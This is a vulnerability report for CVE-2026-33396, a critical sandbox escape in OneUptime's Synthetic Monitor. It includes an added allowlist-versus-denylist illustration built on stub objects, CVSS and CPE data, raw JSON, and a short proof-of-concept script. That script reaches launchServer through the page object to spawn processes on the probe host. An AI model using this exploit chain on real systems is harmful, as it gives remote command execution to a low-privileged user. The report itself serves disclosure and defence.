Security Vulnerability Report
CVE-2026-33396 CVSS 9.9 CRITICAL

Published: 2026-03-26 14:16:13
Last Modified: 2026-03-26 20:40:53

Description

OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.35, a low-privileged authenticated user (ProjectMember) can achieve remote command execution on the Probe container/host by abusing Synthetic Monitor Playwright script execution. Synthetic monitor code is executed in VMRunner.runCodeInNodeVM with a live Playwright page object in context. The sandbox relies on a denylist of blocked properties/methods, but it is incomplete. Specifically, _browserType and launchServer are not blocked, so attacker code can traverse `page.context().browser()._browserType.launchServer(...)` and spawn arbitrary processes. Version 10.0.35 contains a patch.
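
An added illustration, not OneUptime or Playwright code, of why the denylist approach described above fails where an allowlist does not. The stub object graph, `guard`, `makeStubPage` and the DENY and ALLOW sets are all constructed for this example; the stub `launchServer` only records that it was reached.

```javascript
// Stub object graph shaped like the chain in the description (constructed).
function makeStubPage(calls) {
  const browserType = { launchServer: (opts) => { calls.push(opts); return "spawned"; } };
  const browser = { _browserType: browserType, close: () => "closed" };
  const context = { browser: () => browser };
  return { context: () => context, title: () => "Example", goto: (u) => `loaded ${u}` };
}

// Wrap every object and every function result reachable from `target`
// with the same property policy, so the policy follows the traversal.
function guard(target, isAllowed) {
  if (target === null || (typeof target !== "object" && typeof target !== "function")) return target;
  return new Proxy(target, {
    get(obj, prop) {
      // Symbols pass through here; a real sandbox needs a policy for them too.
      if (typeof prop === "string" && !isAllowed(prop)) {
        throw new Error(`blocked property: ${prop}`);
      }
      const value = Reflect.get(obj, prop);
      if (typeof value !== "function") return guard(value, isAllowed);
      return (...args) => guard(value.apply(obj, args), isAllowed);
    },
  });
}

// Constructed denylist (an assumption, not the project's actual list): it names
// some dangerous members but omits _browserType and launchServer.
const DENY = new Set(["constructor", "__proto__", "process", "launch", "close"]);
// Constructed allowlist: only what a monitor script is meant to use.
const ALLOW = new Set(["goto", "title"]);

function tryTraversal(isAllowed) {
  const calls = [];
  const page = guard(makeStubPage(calls), isAllowed);
  try {
    page.context().browser()._browserType.launchServer({ marker: "stub" });
    return { reached: calls.length === 1, error: null };
  } catch (e) {
    return { reached: false, error: e.message };
  }
}

const denylistResult = tryTraversal((p) => !DENY.has(p)); // unlisted names pass
const allowlistResult = tryTraversal((p) => ALLOW.has(p)); // unlisted names fail
console.log({ denylistResult, allowlistResult });
```

With the denylist, any member the list's author did not anticipate is reachable by default; with the allowlist, the traversal stops at the first unlisted property while `goto` and `title` keep working.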

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE
OneUptime < 10.0.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-33396
// Exploits incomplete denylist in OneUptime Synthetic Monitor
// Requires ProjectMember privileges
async function exploit() {
  // The context provides a live Playwright page object
  const page = global.page;
  // Bypass the sandbox by accessing the internal browser type
  // The denylist failed to block '_browserType' and 'launchServer'
  const browserType = page.context().browser()._browserType;
  // Spawn an arbitrary process on the host/container
  // Example: Launching a server or executing a command
  await browserType.launchServer({
    args: ['--no-sandbox', 'touch', '/tmp/pwned']
  });
}
exploit();

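References

https://github.com/OneUptime/oneuptime/commit/e8e4ee3ff0740eb131045ab3d67453141c46178a (Patch)
https://github.com/OneUptime/oneuptime/security/advisories/GHSA-cqpg-phpp-9jjg (Exploit, Vendor Advisory)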

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33396", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:13.310", "lastModified": "2026-03-26T20:40:52.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.35, a low-privileged authenticated user (ProjectMember) can achieve remote command execution on the Probe container/host by abusing Synthetic Monitor Playwright script execution. Synthetic monitor code is executed in VMRunner.runCodeInNodeVM with a live Playwright page object in context. The sandbox relies on a denylist of blocked properties/methods, but it is incomplete. Specifically, _browserType and launchServer are not blocked, so attacker code can traverse `page.context().browser()._browserType.launchServer(...)` and spawn arbitrary processes. Version 10.0.35 contains a patch."}, {"lang": "es", "value": "OneUptime es una plataforma de monitoreo y observabilidad de código abierto. Antes de la versión 10.0.35, un usuario autenticado con bajos privilegios (ProjectMember) puede lograr la ejecución remota de comandos en el contenedor/host de Probe abusando de la ejecución de scripts de Playwright del Monitor Sintético. El código del monitor sintético se ejecuta en VMRunner.runCodeInNodeVM con un objeto de página de Playwright en vivo en contexto. El sandbox se basa en una lista de denegación de propiedades/métodos bloqueados, pero está incompleta. Específicamente, _browserType y launchServer no están bloqueados, por lo que el código del atacante puede recorrer 'page.context().browser()._browserType.launchServer(...)' y generar procesos arbitrarios. 
La versión 10.0.35 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.35", "matchCriteriaId": "BE6EDDCA-31EC-4458-ACF2-9FA51FAE4FAE"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/e8e4ee3ff0740eb131045ab3d67453141c46178a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-cqpg-phpp-9jjg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-cqpg-phpp-9jjg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}